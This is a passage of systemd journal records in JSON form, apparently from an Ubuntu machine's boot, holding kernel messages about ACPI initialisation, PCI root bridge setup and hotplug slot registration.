"_SOURCE_MONOTONIC_TIMESTAMP" : "168010", "MESSAGE" : "ACPI: Added _OSI(3.0 _SCP Extensions)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c2;b=e2b08827b5804427b422c10c84f1567e;m=558a23;t=5bd16dd19098b;x=eae3ea2658bb846e", "__REALTIME_TIMESTAMP" : "1615280779889035", "__MONOTONIC_TIMESTAMP" : "5605923", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "170468", "MESSAGE" : "ACPI: Added _OSI(Processor Aggregator Device)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c3;b=e2b08827b5804427b422c10c84f1567e;m=558a2c;t=5bd16dd190994;x=41913f21bd12619", "__REALTIME_TIMESTAMP" : "1615280779889044", "__MONOTONIC_TIMESTAMP" : "5605932", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "172025", "MESSAGE" : "ACPI: Added _OSI(Linux-Dell-Video)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c4;b=e2b08827b5804427b422c10c84f1567e;m=558a36;t=5bd16dd19099d;x=5a5ce85035bec8c6", "__REALTIME_TIMESTAMP" : "1615280779889053", "__MONOTONIC_TIMESTAMP" : "5605942", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "174297", "MESSAGE" : "ACPI: Added _OSI(Linux-Lenovo-NV-HDMI-Audio)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c5;b=e2b08827b5804427b422c10c84f1567e;m=558a3f;t=5bd16dd1909a7;x=78b88b41e32ef81d", "__REALTIME_TIMESTAMP" : "1615280779889063", "__MONOTONIC_TIMESTAMP" : "5605951", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "176006", "MESSAGE" : "ACPI: Added _OSI(Linux-HPI-Hybrid-Graphics)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c6;b=e2b08827b5804427b422c10c84f1567e;m=558a49;t=5bd16dd1909b0;x=4c34a64f8e5323fc", "__REALTIME_TIMESTAMP" : "1615280779889072", "__MONOTONIC_TIMESTAMP" : "5605961", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "180214", "MESSAGE" : "ACPI: Interpreter enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c7;b=e2b08827b5804427b422c10c84f1567e;m=558a52;t=5bd16dd1909b9;x=e77bf36f1551ba03", "__REALTIME_TIMESTAMP" : "1615280779889081", "__MONOTONIC_TIMESTAMP" : "5605970", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "182170", "MESSAGE" : "ACPI: (supports S0 S3 S4 S5)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c8;b=e2b08827b5804427b422c10c84f1567e;m=558a5b;t=5bd16dd1909c3;x=152e79affa7fa7a5", "__REALTIME_TIMESTAMP" : "1615280779889091", "__MONOTONIC_TIMESTAMP" : "5605979", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "184006", "MESSAGE" : "ACPI: Using IOAPIC for interrupt routing" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c9;b=e2b08827b5804427b422c10c84f1567e;m=558a68;t=5bd16dd1909d0;x=2583037f251faa36", "__REALTIME_TIMESTAMP" : "1615280779889104", "__MONOTONIC_TIMESTAMP" : "5605992", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "186729", "MESSAGE" : "PCI: Using host bridge windows from ACPI; if necessary, use \"pci=nocrs\" and report a bug" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ca;b=e2b08827b5804427b422c10c84f1567e;m=558a75;t=5bd16dd1909dc;x=558fb4a2dc4e9103", "__REALTIME_TIMESTAMP" : "1615280779889116", "__MONOTONIC_TIMESTAMP" : "5606005", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "188219", "MESSAGE" : "ACPI: Enabled 2 GPEs in block 00 to 0F" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cb;b=e2b08827b5804427b422c10c84f1567e;m=558a7f;t=5bd16dd1909e6;x=614576160dde48d8", "__REALTIME_TIMESTAMP" : "1615280779889126", "__MONOTONIC_TIMESTAMP" : "5606015", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "194082", "MESSAGE" : "ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff])" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cc;b=e2b08827b5804427b422c10c84f1567e;m=558b38;t=5bd16dd190aa0;x=ec4fc644a915985a", "__REALTIME_TIMESTAMP" : "1615280779889312", "__MONOTONIC_TIMESTAMP" : "5606200", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "196011", "MESSAGE" : "acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cd;b=e2b08827b5804427b422c10c84f1567e;m=558bc0;t=5bd16dd190b27;x=86ceb47bb867c586", "__REALTIME_TIMESTAMP" : "1615280779889447", "__MONOTONIC_TIMESTAMP" : "5606336", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "199398", "MESSAGE" : "acpi PNP0A03:00: _OSC failed (AE_NOT_FOUND); disabling ASPM" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ce;b=e2b08827b5804427b422c10c84f1567e;m=558c63;t=5bd16dd190bca;x=8006e9f582bdcfc5", "__REALTIME_TIMESTAMP" : "1615280779889610", "__MONOTONIC_TIMESTAMP" : "5606499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "200016", "PRIORITY" : "4", "MESSAGE" : "acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cf;b=e2b08827b5804427b422c10c84f1567e;m=558c81;t=5bd16dd190be8;x=e4630d4082cec94f", "__REALTIME_TIMESTAMP" : "1615280779889640", "__MONOTONIC_TIMESTAMP" : "5606529", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "204440", "MESSAGE" : "acpiphp: Slot [3] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d0;b=e2b08827b5804427b422c10c84f1567e;m=558c8c;t=5bd16dd190bf3;x=74d43fcd51b8a32a", "__REALTIME_TIMESTAMP" : "1615280779889651", "__MONOTONIC_TIMESTAMP" : "5606540", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "206960", "MESSAGE" : "acpiphp: Slot [4] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d1;b=e2b08827b5804427b422c10c84f1567e;m=558c9a;t=5bd16dd190c01;x=c9ee9d4ba2345155", "__REALTIME_TIMESTAMP" : "1615280779889665", "__MONOTONIC_TIMESTAMP" : "5606554", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "208060", "MESSAGE" : "acpiphp: Slot [5] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d2;b=e2b08827b5804427b422c10c84f1567e;m=558ca4;t=5bd16dd190c0c;x=290a75fec63580", "__REALTIME_TIMESTAMP" : "1615280779889676", "__MONOTONIC_TIMESTAMP" : "5606564", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "210320", "MESSAGE" : "acpiphp: Slot [6] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d3;b=e2b08827b5804427b422c10c84f1567e;m=558caf;t=5bd16dd190c16;x=b757a1b1a9814433", "__REALTIME_TIMESTAMP" : "1615280779889686", "__MONOTONIC_TIMESTAMP" : "5606575", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "212068", "MESSAGE" : "acpiphp: Slot [7] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d4;b=e2b08827b5804427b422c10c84f1567e;m=558cb9;t=5bd16dd190c20;x=371cfb0a26cb473a", "__REALTIME_TIMESTAMP" : "1615280779889696", "__MONOTONIC_TIMESTAMP" : "5606585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "214241", "MESSAGE" : "acpiphp: Slot [8] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d5;b=e2b08827b5804427b422c10c84f1567e;m=558cc3;t=5bd16dd190c2a;x=d7cd86ed04f23905", "__REALTIME_TIMESTAMP" : "1615280779889706", "__MONOTONIC_TIMESTAMP" : "5606595", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "216075", "MESSAGE" : "acpiphp: Slot [9] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d6;b=e2b08827b5804427b422c10c84f1567e;m=558ccd;t=5bd16dd190c34;x=109ca8f7a7b8f084", "__REALTIME_TIMESTAMP" : "1615280779889716", "__MONOTONIC_TIMESTAMP" : "5606605", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "218093", "MESSAGE" : "acpiphp: Slot [10] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d7;b=e2b08827b5804427b422c10c84f1567e;m=558cd7;t=5bd16dd190c3f;x=254b2a4852bf3ab8", "__REALTIME_TIMESTAMP" : "1615280779889727", "__MONOTONIC_TIMESTAMP" : "5606615", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "220054", "MESSAGE" : "acpiphp: Slot [11] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d8;b=e2b08827b5804427b422c10c84f1567e;m=558ce5;t=5bd16dd190c4c;x=c2d4e9cbb43a1b58", "__REALTIME_TIMESTAMP" : "1615280779889740", "__MONOTONIC_TIMESTAMP" : "5606629", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "222142", "MESSAGE" : "acpiphp: Slot [12] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d9;b=e2b08827b5804427b422c10c84f1567e;m=558cef;t=5bd16dd190c57;x=edcbddafee92b0f", "__REALTIME_TIMESTAMP" : "1615280779889751", "__MONOTONIC_TIMESTAMP" : "5606639", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "224055", "MESSAGE" : "acpiphp: Slot [13] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=da;b=e2b08827b5804427b422c10c84f1567e;m=558cf9;t=5bd16dd190c61;x=ff342f0e7778618d", "__REALTIME_TIMESTAMP" : "1615280779889761", "__MONOTONIC_TIMESTAMP" : "5606649", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "226203", "MESSAGE" : "acpiphp: Slot [14] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=db;b=e2b08827b5804427b422c10c84f1567e;m=558d06;t=5bd16dd190c6e;x=c01dbd6857ee3cbd", "__REALTIME_TIMESTAMP" : "1615280779889774", "__MONOTONIC_TIMESTAMP" : "5606662", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "228056", "MESSAGE" : "acpiphp: Slot [15] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=dc;b=e2b08827b5804427b422c10c84f1567e;m=558d11;t=5bd16dd190c78;x=1cecf41a859e0d9a", "__REALTIME_TIMESTAMP" : "1615280779889784", "__MONOTONIC_TIMESTAMP" : "5606673", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "230194", "MESSAGE" : "acpiphp: Slot [16] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=dd;b=e2b08827b5804427b422c10c84f1567e;m=558d1b;t=5bd16dd190c83;x=6f4fd28d63c8a383", "__REALTIME_TIMESTAMP" : "1615280779889795", "__MONOTONIC_TIMESTAMP" : "5606683", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "232074", "MESSAGE" : "acpiphp: Slot [17] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=de;b=e2b08827b5804427b422c10c84f1567e;m=558d25;t=5bd16dd190c8d;x=92ce5d577915cc12", "__REALTIME_TIMESTAMP" : "1615280779889805", "__MONOTONIC_TIMESTAMP" : "5606693", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "234204", "MESSAGE" : "acpiphp: Slot [18] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=df;b=e2b08827b5804427b422c10c84f1567e;m=558d2f;t=5bd16dd190c97;x=eb1e4f71c91af795", "__REALTIME_TIMESTAMP" : "1615280779889815", "__MONOTONIC_TIMESTAMP" : "5606703", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "236052", "MESSAGE" : "acpiphp: Slot [19] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e0;b=e2b08827b5804427b422c10c84f1567e;m=558d3a;t=5bd16dd190ca1;x=acdf7eb7d06d831f", "__REALTIME_TIMESTAMP" : "1615280779889825", "__MONOTONIC_TIMESTAMP" : "5606714", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "238186", "MESSAGE" : "acpiphp: Slot [20] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e1;b=e2b08827b5804427b422c10c84f1567e;m=558d44;t=5bd16dd190cab;x=922cc8b31e4c0829", "__REALTIME_TIMESTAMP" : "1615280779889835", "__MONOTONIC_TIMESTAMP" : "5606724", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "240052", "MESSAGE" : "acpiphp: Slot [21] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e2;b=e2b08827b5804427b422c10c84f1567e;m=558d4e;t=5bd16dd190cb5;x=32612c6d0dba1840", "__REALTIME_TIMESTAMP" : "1615280779889845", "__MONOTONIC_TIMESTAMP" : "5606734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "242203", "MESSAGE" : "acpiphp: Slot [22] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e3;b=e2b08827b5804427b422c10c84f1567e;m=558d6a;t=5bd16dd190cd2;x=aea19448686e6875", "__REALTIME_TIMESTAMP" : "1615280779889874", "__MONOTONIC_TIMESTAMP" : "5606762", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "244053", "MESSAGE" : "acpiphp: Slot [23] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e4;b=e2b08827b5804427b422c10c84f1567e;m=558d83;t=5bd16dd190ceb;x=b59ff18ba9e88ffb", "__REALTIME_TIMESTAMP" : "1615280779889899", "__MONOTONIC_TIMESTAMP" : "5606787", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "246254", "MESSAGE" : "acpiphp: Slot [24] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e5;b=e2b08827b5804427b422c10c84f1567e;m=558d8f;t=5bd16dd190cf7;x=b1df68348006767", "__REALTIME_TIMESTAMP" : "1615280779889911", "__MONOTONIC_TIMESTAMP" : "5606799", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "248053", "MESSAGE" : "acpiphp: Slot [25] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e6;b=e2b08827b5804427b422c10c84f1567e;m=558d9a;t=5bd16dd190d01;x=4dcb9e0ec273830f", "__REALTIME_TIMESTAMP" : "1615280779889921", "__MONOTONIC_TIMESTAMP" : "5606810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "250238", "MESSAGE" : "acpiphp: Slot [26] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e7;b=e2b08827b5804427b422c10c84f1567e;m=558dab;t=5bd16dd190d13;x=31ac93d807cba66f", "__REALTIME_TIMESTAMP" : "1615280779889939", "__MONOTONIC_TIMESTAMP" : "5606827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "252055", "MESSAGE" : "acpiphp: Slot [27] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e8;b=e2b08827b5804427b422c10c84f1567e;m=558dbc;t=5bd16dd190d24;x=ad184afb6e01a9f4", "__REALTIME_TIMESTAMP" : "1615280779889956", "__MONOTONIC_TIMESTAMP" : "5606844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "254696", "MESSAGE" : "acpiphp: Slot [28] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e9;b=e2b08827b5804427b422c10c84f1567e;m=558dd7;t=5bd16dd190d3f;x=afe1777123395e10", "__REALTIME_TIMESTAMP" : "1615280779889983", "__MONOTONIC_TIMESTAMP" : "5606871", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "256061", "MESSAGE" : "acpiphp: Slot [29] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ea;b=e2b08827b5804427b422c10c84f1567e;m=558de1;t=5bd16dd190d48;x=3f915f30eba4e271", "__REALTIME_TIMESTAMP" : "1615280779889992", "__MONOTONIC_TIMESTAMP" : "5606881", 